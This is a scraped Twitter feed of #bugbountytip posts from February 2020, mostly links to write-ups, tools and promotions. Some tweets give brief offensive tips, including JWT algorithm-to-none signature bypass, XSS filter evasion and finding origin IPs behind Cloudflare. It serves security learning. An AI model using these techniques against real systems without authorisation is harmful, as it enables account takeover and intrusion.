5 CSV Injection: https://t.co/loAf6mRXft ClickJacking: https://t.co/kcOYSJcbUG Exposed Firebase DB: https://t.co/WGzatNLO3C Config Files: https://t.co/Kft6p37wJM Kubernetes API : https://t.co/IZyHZ1gUJt #bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss https://t.co/73dOl6kmfM
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-22 15:22:21
9 100 ways to discover (part 1).pdf https://t.co/kCMiq7Zo1o Pentesting.pdf https://t.co/gqpXSJ29D7 Building a Malware Analysis Lab:Become a Malware Analysis Hunter in 2019.pdf https://t.co/pOvtev7KqN #bugbountytips #hacking #OSINT #pentest #redteam #Malware #bugbountytip #infosec
siLLyDaDDy
@sillydadddy


2020-02-22 13:00:12
2 #bugbounty #bugbountytip All the bug bounty write ups from @PentesterLand in an excel format . https://t.co/9xNrXKNzaP I just wanted to keep track of the https://t.co/2BlY5zTycw i pulled out the data .Hope @PentesterLand wont mind !!
Vijaysimha Reddy Bathini
@fatratfatrat


2020-02-22 11:34:58
5 My new writeup on account takeover vulnerabilities. Thanks to @Bugcrowd . https://t.co/GeLF2Xatoh #BugBounty #infosec #bugbountytip #bugbountytips #bugcrowd #CyberSecurity
Your Next Bug Tip
@YourNextBugTip


2020-02-22 08:38:15
5 Open Redirect to Account Takeover when token didn't leak Takeover is only possible when token leak with get request. But he manage to takeover without it. Profile https://t.co/VyQuQ70sqf https://t.co/Oy52jljsrG #bugbountytip #bugbounty #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-22 08:32:59
0 Usefull Link to Learn Pentesting and Bug Bounty : If you want to learn Cyber Security and Ethical Hacking from professionals - Reach out to us ! https://t.co/iNczOcXY13 https://t.co/E2teD1IjCh #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-22 08:30:20
0 OWASP Vulnerabilities https://t.co/rYwbpkyizq Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-22 08:26:57
1 Vulnerability Rating Taxonomy - VRT Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 https://t.co/Td94mIsExN #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
ghostlulz
@ghostlulz1337


2020-02-21 23:55:01
1 Client Side Template Injection is the modern day XSS. People think frameworks like Angular are immune to XSS but it isn't. Its just a little bit different to execute.More info on my blog https://t.co/JnSGKDmvLm #BugBounty #bugbountytips #infosec #bugbountytip #redteam #Angular https://t.co/q2VZmkMsIs
Tomi Koski ๐Ÿ’พ๐Ÿ’€
@tomikoski


2020-02-21 18:51:33
0 Ahoy all #BugBounty hunters, support marvelous work from creator of #ffuf and sponsor this dude @joohoi at #github You can do it๐Ÿค˜#bugbountytip
Shifa
@shifa_skh


2020-02-21 16:08:14
2 Alway convert parameter to array you will get unexpected result, some times xss bypass Like, path=/abc to path["]=/abc #bugbountytip
Israel Thomas
@IsraelThomas_7


2020-02-21 14:28:23
0 John Doe: Read the damn documentation before you start hunting on my program. Me: Yeah sure, I'm still checking for the hidden document endpoint. ๐Ÿ˜ #bugbountytip #infosec
Mayur Parmar
@th3cyb3rc0p


2020-02-21 13:26:48
0 Pro tip for bug hunting while making report dont forget to add fix of that vuln. It will increase to get bonus points/bounty. #th3cyb3rc0p #bugbountytip #bugbounty @intigriti @Bugcrowd @Hacker0x01 @openbugbounty @synack
apuhc
@apuhccc


2020-02-20 20:38:24
0 #ProTip #burpsuite #bugbountytip by @Agarri_FR (thank you master ) https://t.co/uuptoV0KtV
Sofiane Hamlaoui
@S0fianeHamlaoui


2020-02-20 15:21:50
4 @CyberSecCare CyberSecCare : A python Twitter that retweets all Security-Related tweets. Video on Youtube : https://t.co/lHmtfXOy1e #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/Qv7NuXk5A4
Security Executions Code
@pwn0sec


2020-02-20 15:06:11
2 Reflected (XSS) Vulnerability - on https://t.co/d5oILl2Zpw (Sandbox Domain) https://t.co/JeyZTE46cc #bugbountytip #bugbountytips #googlexss #xss https://t.co/9jesYX7z3S
Security Executions Code
@pwn0sec


2020-02-20 14:10:48
1 Broken Authentication and session management (OWASP A2) https://t.co/iFznOWZvfv #bugbountytip #bugbountytips #owasp https://t.co/0yZGL5z3al
Mohit Sharma
@ms1241721


2020-02-20 12:45:09
0 #Bugbountytip Founded no rate limit on login page : Reported but got Duplicate Tried again on another critical endpoint : Triaged Lesson learnt - If one endpoint is vulnerable , check all other, chances are they will also be vulnerable
Bug Spotter ๐Ÿ”
@BugSpotter


2020-02-20 03:58:36
0 "Good bugs do not require grear skills! They require sharp eyes" -Anees Khan #infosec #BugBounty #Bugbountytip
Mourad
@SecuAudit


2020-02-19 20:10:32
2 Everything is marked as "Low severity" and There is nothing you can do except leaving this program. #BugBounty #Bugbountytip @Hacker0x01 https://t.co/V9zRDo9Vxb
GokhanGK
@gkhck_


2020-02-19 19:40:43
1 New write-up ๐Ÿฅณ๐Ÿฅณ๐Ÿฅณ #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/E4UnlvFHWi
Leonishan
@leonishan_


2020-02-19 19:00:31
3 WAF Bypassing with Unicode Compatibility https://t.co/jSccqnlGQC #BugBounty #Bugbountytip #WAF #wafbypass #XSS
theCBTL_Edge
@theCBTL_Edge


2020-02-19 18:32:10
0 Researchers have tricked Tesla vehicles into accelerating from 35 mph to 85 mph using duck tape. The researchers modified the shape of a 3 to look like an 8 on multiple street signs. #Tesla #Bugbountytip
Manyasa Oliver
@M_Oliver_Watiti


2020-02-19 18:26:12
0 Anyone Who Has come accross .htmopt extention anywhere? #Bugbountytip #bugbounty
Pranav Hivarekar
@HivarekarPranav


2020-02-19 17:00:01
6 Mastering the Skills of Bug Bounty by @vickieli7 via @thestartup_ https://t.co/LZGj7GQW5n #bugbounty #bugbountytip
z3rb0a
@OwlCyberGhost1


2020-02-19 16:02:41
0 #bugbountytip #bugbounty Wreid Bug. Changing my username to number 10 or 12 or ...10000 will disclose other user Information ( Including Access token & Session token ) Lol xD
Shubham Sharma
@Shubham_pen


2020-02-19 14:32:44
0 Meterpreter, a highly developed payload that can be extended dynamically, is known to be Hackerโ€™s Swiss Army Knife. @rajchandel @kalilinux #cybersecurity #infosec #pentest #oscp #meterpreter #Bugbountytip #Hackers #WednesdayWisdom https://t.co/PbDAnudJFL
Nameless
@3301o


2020-02-19 13:23:28
0 When use WayBackUrls by @TomNomNom, use below Regex to find parameterized URL(s): \/[A-Za-z0-9_.-]*[a-z]*\?.*= #bugbountytips #Bugbountytip #BugBounty
Cyber Security Bot
@CyberSecCare


2020-02-19 09:47:15
3 Follow to get all Security/Cyber Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
CyberTaters
@CyberTaters


2020-02-19 08:58:16
2 Follow to get all Security/Potato Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #potatosecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #mashing
Cyber Security Bot
@CySecuritybot


2020-02-19 08:58:11
2 Follow to get all Security/Cyber Security related tweets. A bot made by @S0fianeHamlaoui which looks for and retweets tweets cotaining the the below twitter tags : #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
Manoj Khadka
@Manojkhd


2020-02-19 08:39:52
0 Websites vulnerability and Bug reporting @Administor #Bugbountytip #bughunter #vulnerable #webserver #xss #crsf https://t.co/Go7DFoSqBR
HackIsOn ยฎ
@hackison


2020-02-19 08:17:49
2 #Bugbountytip If you want to bypass cloudflare protection and find the targetโ€™s origin ip. Use : https://t.co/TGirjy7p2g to find targets domainโ€™s DNS history. C2C ๐Ÿค— #bugbounty #bugbountytip #bugbountytips #hackison #hacking #vapt #wapt #pentesting #redteaming #redteam
Oghenejivwe ๐Ÿ‡ณ๐Ÿ‡ฌ๐Ÿ—ฏ
@realOghenejivwe


2020-02-19 06:20:25
0 I need to find my first bug. Not even because of the money. For my mental health. #BugBounty #Bugbountytip
Pratik Yadav
@PratikY9967


2020-02-19 05:29:18
0 Sometime .gitignore file can help you to get database credentials as well try to visit all endpoints endpoints showed up by gitignore on all subdomains :)๐Ÿ˜‚๐Ÿ˜‚ #bugbountytip #bugbounty #infosec https://t.co/qAjnmRXLgs https://t.co/lGKsuT7C5x
Joseph Melika
@jmelika


2020-02-19 04:16:30
0 #bugbountytip When you see SSO with JWT, intercept, decode, change the alg to either none or HS232 to bypass signature and send the new encoded JWT instead. If it goes through, you hit the jackpot. #SecureTheInternet #CESPPA #bugbounty #bugbountytips
Hx01
@Hxzeroone


2020-02-18 16:31:35
2 #Bugbountytip If you want to bypass cloudflare protection and find the targetโ€™s origin ip. Use : https://t.co/NU3CNcekJi to find targets domainโ€™s DNS history. https://t.co/yz1Z2jGKvN
ALL ABOUT HACKER
@AboutHacking


2020-02-18 16:24:43
0 How to start Bug Bounty Hunting Read: https://t.co/9DAu77YcZ8 #CyberSecurity #bugbounty #bugbountytips #bugbountytip
Pranav Hivarekar
@HivarekarPranav


2020-02-18 15:30:00
8 WebSockets Security Testing: - https://t.co/yjUbgZJeZY - https://t.co/Gf6dofbt7J - https://t.co/ykbQAv6b8G Tools: - https://t.co/tw3icPAFZS - Burp - https://t.co/UpH9TM3TWK Case studies: - https://t.co/AaY9a6GFQ1 - https://t.co/0D1c9c8bhW #bugbounty #bugbountytip #infosec
Shubham Sharma
@Shubham_pen


2020-02-18 15:18:58
1 Today you will learn how to escalate the root shell if docker is running on the hots machine or I should say @Docker privilege escalation to spawn root shell. @rajchandel @ubuntu #cybersecurity #pentest #ITSecurity #bugbountytip #infosec #tuesdayMotivation https://t.co/4vYoWaz2fY
Brett Russell ๐ŸŒ
@brettarussell


2020-02-18 15:06:45
0 You're smart when you can set your own Bug Bounty. Unfortunately they chose to reward themselves handsomely. #bugbountytip https://t.co/7V1A8iZd30
Brett Russell ๐ŸŒ
@brettarussell


2020-02-18 15:04:05
0 @crypto_bobby You're smart when you can set your own Bug Bounty. Unfortunately they chose to reward themselves handsomely. #bugbountytip
Seasoned Cyber Security Professionals
@scspcommunity


2020-02-18 14:45:36
2 Bug Bounty Tips part 3 #bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bugcrowd #hacker #ethicalhacking #hacking #Pentesting #webapp #webappsec #appsec #applicationsecurity #infosec #cybersec #cybersecurity #informationsecurity https://t.co/YMP5pCY7yE
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2020-02-18 14:06:11
3 Also, You can check the domain, if it have any private program on Bugcrowd by looking it's TXT record with dig dig TXT domain.tld | grep bugcrowd #BugBounty #BugBountyTip #OutHackThemAll https://t.co/WCbwg4ZNxo
Jake Miller
@theBumbleSec


2020-02-18 13:01:10
15 I am excited to release my new tool GadgetProbe: Inspect endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote classpaths. No more sitting in the dark if ysoserial doesn't fire. https://t.co/lJfeIMMzeU #bugbounty #bugbountytip
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2020-02-18 12:10:07
1 Hey Bug Bounty Folks, Want more private programs on Bugcrowd? Just visit this https://t.co/iqgKAiy5Xr Also, dig TXT domain.tld | grep bugcrowd #BugBountyTip ๐Ÿค™
Nouroz Gaming
@NourozGaming


2020-02-18 08:05:58
0 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/rtAQmQFkUU
Khaled Mohamed
@0xElkomy


2020-02-17 21:03:25
0 OneLogin authentication bypass on WordPress sites https://t.co/6NcFwEg5lk #bugbountytips #bugbounty #bugbountytip
CyberTheReapeRโ˜ข
@CyberTheReapeR5


2020-02-17 19:07:41
0 Yay, i earned 300$ I did not win this award on any bug bounty platform #hackerone #bugcrowd #infosec #bugbountytip
m0z
@LooseSecurity


2020-02-17 18:51:32
1 Three really good event handlers for XSS would be: onfocus onsearch And also using accesskeys, which is usually low severity but a really easy way to get XSS as it bypasses most security measures. #bugbountytips #bugbountytip #bugbounties #infosec #infosecurity #coronavirus
Your Next Bug Tip
@YourNextBugTip


2020-02-17 17:18:32
5 XSSI and JSONP found by Omkar Bhagwat @th3_hidd3n_mist Important notes and #bugbountytips at the end of the WriteuP Vul Worth $$800$$ If you are new to XSSi and JSONP then MUST READ the WriteuP #bugbountytip #bugbounty https://t.co/vOguXKK8Te
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-02-17 16:11:46
1 1) Data Processing (IBB) disclosed a bug submitted by geeknik https://t.co/yqNZldQJ1p 2) \[API\] ICQ user's avatar can be manipulated remotely https://t.co/O31iYklXPk #bugbountytips #bugbounty #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-02-17 16:11:14
2 1) CORS misconfiguration which leads to the disclosure of certain data concerning the user\. https://t.co/AfzrUS0BAh 2) JAVASCRIPT INJECTION IN SIX ANDROID MAIL CLIENTS https://t.co/RAo0IlmgEV #bugbountytips #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-17 09:24:29
2 Cisco Type 7 Reverser Paste any Cisco IOS "type 7" password string into the form below to retrieve the plaintext value. Follow Hackdoor - https://t.co/iNczOcGmCt https://t.co/uTzPKkBn6S #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-17 09:19:05
3 CEHv9-Notes - If you want to be professional Penetration Tester and Bug Bounty Expert - Follow Hackdoor : Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #cybersecurity https://t.co/LIlYcZOBk7
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-16 21:59:57
0 CTF Challenges Archives: https://t.co/xFeGOlUGhs #bugbountytip #hacking #pentest #redteam
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-16 21:53:51
1 Find Secret API-Keys: https://t.co/6BZkftxJnJ #bugbountytip #hacking
Andrew Roe
@aroe1994


2020-02-16 21:04:18
0 We are LIVE with #HackTheBox! https://t.co/a2ASaTS2z3 #cybersecurity #bugbountytip
CyberTheReapeRโ˜ข
@CyberTheReapeR5


2020-02-16 17:28:08
0 ฤฐ earned 2.000$ (I did not win this award on any bug bounty platform) Bugs: 2 subdomain takeover 2 xss (self and reflected) 1 sql injection 1 SQL database username and password information. Total: 2.000$ #hackerone #bugcrowd #infosec #bugbountytip
ghostlulz
@ghostlulz1337


2020-02-16 16:55:45
0 Bug Bounty Slack Group over 1,500 hackers. If your looking for a space where you can chat, learn, share knowledge, and meet like minded people you should check out my slack channel. https://t.co/lwmVfsjSPm #bugbounty #bugbountytips #bugbountytip #infosec #redteam #security https://t.co/RBR2vQBlFN
Pranav Hivarekar
@HivarekarPranav


2020-02-16 14:04:43
12 SAML Security Testing Tutorial: 1 - https://t.co/imIWYX6AdF 2 - https://t.co/Gz9Vg2DeoX 3 - https://t.co/RVX6m56n0W Attack Surface: https://t.co/DIsjXQYJ06 Examples of bugs: - https://t.co/D6aHlzTxlA - https://t.co/YFy5SHYHL4 - https://t.co/e74Msi6a3k #bugbounty #bugbountytip
Shubham Patel
@Shubham_4500


2020-02-16 07:51:52
0 #bugbountytip #bugbountytips Report First and then in free time do the additional exploit , got duplicate with the difference of 4 reports, its part of bugbounty life :) lesson learned with heart full of guilt. #hackerone #bugbountylife #bugcrowd https://t.co/g0aBsB8I2G
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-16 07:25:48
7 Which one do you prefer ? #GOOGLE v/s #DUCKDUCKGO Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/9YlR6DAjcZ
ghostlulz
@ghostlulz1337


2020-02-16 03:20:13
10 You know Django, Flask and many other python web libraries are vulnerable to RCE when you enable debug mode. Most people don't know this is possible. More info on my blog: https://t.co/rpPIaQpDaL #bugbounty #bugbountytips #bugbountytip #redteam #infosec #flask #django #python https://t.co/JrUzyoI10q
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-16 02:46:26
0 #unc0ver v4.0.0 is NOW OUT - Now with full-fledged support for A12-A13 devices on iOS 13.0-13.3 with Cydia and system-wide tweak injection! Get it at: https://t.co/Wfzq4z4aQU Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-15 17:59:50
1 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jDvHB5ty2z
Edwin Digital #digitalke #edmuke
@digitalked


2020-02-15 17:23:31
1 Do you like the wayback machine? Do you like sqli injection? What happens when you combine them both, you get a unique sqli scanner. Check out my blog for more info: https://t.co/a80MXOn1er #BugBounty #bugbountytips #bugbountytip #osint #hacking #dfir #infosec #sqli
Abdullah Fares Muhanna
@amad3u6


2020-02-15 16:48:11
1 @Burp_Suite To avoid @zaproxy crashes when you have Large Response, try to install oracle JDK instead of OpenJDK #bugbountytips #bugbountytip #bugbounty #infosec
Abdullah Fares Muhanna
@amad3u6


2020-02-15 16:43:25
1 You can specify memory size for @Burp_Suite to make it more smoother by using -Xmx (3GB example): ~$ java -jar -Xmx3072M /path/to/burpsuite.jar or ~$ java -jar -Xmx3G /path/to/burpsuite.jar #bugbountytips #bugbountytip #bugbounty #infosec
ghostlulz
@ghostlulz1337


2020-02-15 15:53:12
2 If your looking to make a ๐Ÿค‘living๐Ÿค‘ doing Bug Bounties or Pentesting you may want to get a copy of my book. Easy wins all day๐Ÿ’ฐ. https://t.co/zJFRZjg5q2 #bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #appsec #cybersecurity #xss #hacker #cyber #security https://t.co/rSdiFyIR9U
Nikhil Mahajan
@mahajan344


2020-02-15 15:02:38
0 want to do a static and dynamic analysis of android apps on the fly / on the web. use @apklabio They provide very good static /dynamic /network analysis of apk files. #AndroidSecurity #bugbountytip #bugbounty #AndroidHackingMonth on @Hacker0x01 https://t.co/cNXt1gKLvg
Str0k1rch๐Ÿดโ€โ˜ ๏ธ
@str0k1rch


2020-02-15 13:01:24
1 Make sure to update fellow hacker ;) #bugbountytip https://t.co/SzEKGgxNaX
Khaled Mohamed
@0xElkomy


2020-02-15 11:03:07
0 Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target. https://t.co/Yhzwb92gOV #bugbountytips #bugbounty #infosec #bugbountytip
Pranav Hivarekar
@HivarekarPranav


2020-02-15 08:48:57
7 Shodan Pentesting Guide https://t.co/ef11lug0EW #bugbounty #bugbountytip
Hridoy Ahmed
@hridoysec


2020-02-15 05:43:41
0 #bugbountytip from @TH3G3NT https://t.co/jRtpMU2f1F
Your Next Bug Tip
@YourNextBugTip


2020-02-15 04:39:55
0 Must Read #bugbountytip https://t.co/haPpJR89XF
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-14 19:14:04
1 #BugBountyTip : Be creative with wordlists. #Seclists is great but every bug hunter uses it. If you are looking for non-#duplicates use #CRUNCH to generate your own wordlists specific to your web app / api platform ! Follow #Hackdoor - https://t.co/iNczOcGmCt #bugbountytips
Steve Mcilwain
@steve_mcilwain


2020-02-14 16:48:01
0 Automate your recon screenshots via command line or script with Eyewitness. Can take a file of URLs as input. https://t.co/Tc6yWK3ulG #pentest #pentesting #bugbountytip #bugbountytips #hacking
Your Next Bug Tip
@YourNextBugTip


2020-02-14 16:42:46
2 Unique way of Account Takeover @0xAkash figure out how to create password reset token!! Must Read (2 min read) https://t.co/Xfax4i7lSN #bugbounty #bugbountytips #bugbountytip
Imran Parray
@CreedHackers


2020-02-14 16:40:52
1 #BugBountyTip You will always Find what you are looking for. So if you haven't found a RCE,SSRF or any other critical ones yet. Probably you aren't looking for them.
Your Next Bug Tip
@YourNextBugTip


2020-02-14 14:11:24
0 What are some good Hacker's Groups? On #Discord #Slack #anyPlatform #bugbounty #bugbountytips #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-14 13:12:35
11 use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons: https://t.co/lBtuovYuWB 19-extensions-to-turn-google-chrome-into-penetration-testing-tool: https://t.co/f2rcEFu7LX #bugbountytip #hacking #pentest #BugBounty
Kartik Charande
@kartikraj909


2020-02-14 09:49:51
0 Amazing write up quick explanation #bugbountytip #infosec https://t.co/ezJBqzZdrw
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-14 06:01:12
3 SimplyEmail: -setup: curl -s https://t.co/MO25nwVDJD -usage: ./SimplyEmail -all -v -e https://t.co/KdHhpMULry results: firefox https://t.co/KdHhpMULry<date_time>/Email_List.html -1-email address format of the target -2-list of valid users #OSINT #pentest #bugbountytip #hacking
Mourad
@SecuAudit


2020-02-13 22:31:42
0 @Godaddy Bug Bounty is a scam , i got a lot of testimonials of security researchers scammed by them #bugbounty #bugbountytip #bugbountytips #infosec #Hacker0x01 @GoDaddyCanada @GoDaddyHelp https://t.co/GcoryY6rbf
Mast3rM1nd
@lollysofsof


2020-02-13 22:25:54
2 let's educate each others :) #infosec #pentesting #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 19:45:34
0 From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13 Follow #Hackdoor Facebook https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training https://t.co/mHCTPO2kMP
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 18:06:51
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Nm2ZSJHS74
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 18:06:16
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/spJfF1f6qy
Ganesh Bagaria
@Ganofins


2020-02-13 14:24:50
0 I just finished Access Control materials and labs on @WebSecAcademy Any suggestion for other labs or exercises or live sites based on access control vulnerabilities? #accesscontrol #idor #portswigger #bugbountytip
INTIGRITI
@intigriti


2020-02-13 14:05:21
18 โš ๏ธ Are you signing your JWT tokens? Good...unless hackers can change the signing algorithm to ๐˜ฏ๐˜ฐ๐˜ฏ๐˜ฆ. Make sure to check this, or @yassineaboukir will do it for you and claim yet another #BugBounty! ๐Ÿ˜‚ #BugBountyTip #HackWithIntigriti https://t.co/1sW1B766Qi
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-02-13 12:39:55
1 New write-up for beginners like me. #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/DaPtYGY7pB
Seasoned Cyber Security Professionals
@scspcommunity


2020-02-13 09:10:16
7 #bugbounty tips part 2 #hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pentesting #webapptesting #webappsecurity #appsec #hackerone #bugcrowd #bounty #infosec #cybersec #cybersecurity #informationsecurity #hacker #bughunting #bugbountytips https://t.co/4pcPahsC8Z
Your Next Bug Tip
@YourNextBugTip


2020-02-13 08:38:07
1 Reflected XSS on 8x8 Found In 3 minutes by @gkhck_ Recently I have seen lots of people using ARJUN to find hidden parameters. Great Tool by @s0md3v Must Read WriteUp Here(1min read) #bugbounty #bugbountytips #bugbountytip https://t.co/Ga3x3fxeiO
HackDoor
@hackd00r


2020-02-13 04:03:45
0 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/IWvPfE8LgK Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p LinkedIn - https://t.co/Chd0Qii4TT Instagram - https://t.co/1YqKY0ZFK1 Youtube - https://t.co/ovEGR1Is7q #BugBounty #BugBountyTip #pentesting #devsecops
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-13 04:01:14
0 Resources-for-Beginner-Bug-Bounty-Hunters Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining https://t.co/ZHnkjd1adq
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-13 00:55:20
1 Google Dorking: https://t.co/AoJ94PbopC #OSINT #bugbountytip #Hacking
jdksec
@jdksec


2020-02-13 00:30:14
2 So lost in tmux nested sessions....... ๐Ÿ˜‚ #bugbounty #bugbountytip #hackerone #bugcrowd #allthegearnoidea https://t.co/EeS49RPLEY
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-02-12 21:27:08
1 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/QYXjW7O3xv #BugBounty #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-12 18:00:14
3 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/3zAyRpdIfd
Evan Custodio
@defparam


2020-02-12 16:56:09
0 If y'all haven't heard about cloud-init, check it out https://t.co/y4S8Gdwqro #bugbountytips #bugbountytip https://t.co/cADixG2ti4
Cryptographer
@crypt0gr4ph3r


2020-02-12 15:51:15
0 Awarded $1,000 bounty of out of scope but very sensitive info disclose. Thanks @NahamSec for this #bugbountytip #bugbounty #hackerone https://t.co/eMGfDHxeGl
siLLyDaDDy
@sillydadddy


2020-02-12 14:02:31
0 #bugbounty #bugbountytip Just finished reading the book "web application hackers handbook ". Still very relevant .Awesome book.Highly recommended for new bug bounty hunters ... I will go back to it again later !!!! Thanks @DafyddStuttard and @MDSecLabs for your hard work !!!
o k t a v a n d i
@0ktavandi


2020-02-12 13:46:03
0 any tips to create 'null' origin? #bugbountytips #bugbountytip
Evan Custodio
@defparam


2020-02-12 13:39:42
1 I know some of you are doing this but, wanna increase your recon game? Create an automation framework on your VPS provider. I went from manual scans to 5-10 droplet workers auto scanning my targets. My recon data to analyze increased 10x. #bugbountytip (insert draw the owl meme)
Darkside
@darksh1d3


2020-02-12 12:07:24
1 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/blPPs3GtWSย โ€ฆ #OSWE #bugbountytips #bugbountytip https://t.co/b7dMpByfTW
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-12 07:50:06
